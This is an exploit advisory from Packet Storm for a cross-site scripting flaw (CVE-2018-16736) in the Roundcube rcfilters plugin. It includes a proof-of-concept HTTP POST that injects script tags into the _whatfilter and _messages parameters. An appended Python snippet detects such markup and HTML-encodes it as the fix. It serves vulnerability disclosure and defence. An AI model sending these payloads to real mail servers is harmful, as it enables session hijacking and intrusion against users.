Source: packetstormsecurity.com (PACKETSTORM:149430)
Author: Fahimeh Rezaei
Published: Sep 19, 2018 - 12:00 a.m.

Roundcube rcfilters 2.1.6 Cross Site Scripting


EPSS: 0.001 (percentile 42.2%)

```text
# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736
# https://nvd.nist.gov/vuln/detail/CVE-2018-16736
# https://github.com/eagle00789/RC_Filters/issues/19

# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the
# _whatfilter and _messages parameters (in the Filters section of the settings).

# PoC

POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1

_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]<script>alert('XSS-1')</script>&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])<script>alert('XSS-2')</script>
```
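Added defender-side example, not part of the Packet Storm advisory or the rcfilters plugin code: a Python check that flags a filters-save request body whose `_whatfilter` or `_messages` value carries markup (the two parameters the advisory names), beside the output-encoding that the plugin was missing. The regex, function names and the use of the PoC body as sample input are assumptions made for this example.

```python
import html
import re
from urllib.parse import parse_qs

# Parameters the advisory reports as reflected unencoded by rcfilters 2.1.6.
RCFILTERS_REFLECTED_PARAMS = ("_whatfilter", "_messages")

# These values should only ever be a header name ("from") or a keyword ("all"),
# so any tag/attribute-breaking character or script-ish token is worth flagging.
# Assumed pattern, tuned for this plugin, not a general XSS detector.
_MARKUP_RE = re.compile(r"""[<>"']|javascript:|on\w+\s*=""", re.IGNORECASE)


def flag_markup_in_body(body: str, params=RCFILTERS_REFLECTED_PARAMS) -> dict:
    """Return {param: value} for each watched parameter whose submitted value
    contains markup. Usable as a WAF rule or over captured POST bodies."""
    fields = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in params:
        for value in fields.get(name, []):
            if _MARKUP_RE.search(value):
                hits[name] = value
    return hits


def render_safely(value: str) -> str:
    """The fix on the output side: HTML-encode before echoing the value back
    into the settings page. quote=True also neutralises ' and " so the value
    is safe inside attribute context, not just between tags."""
    return html.escape(value, quote=True)


# Constructed sample: the request body from the PoC above, used as test input.
POC_BODY = ("_token=09bcde247d252364ea55c217c7654a1f"
            "&_whatfilter=from]<script>alert('XSS-1')</script>"
            "&_searchstring=whatever&_casesensitive=1&_folders=INBOX"
            "&_messages=all])<script>alert('XSS-2')</script>")

if __name__ == "__main__":
    for name, value in flag_markup_in_body(POC_BODY).items():
        print(f"{name}: {value!r} -> rendered as {render_safely(value)!r}")
```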
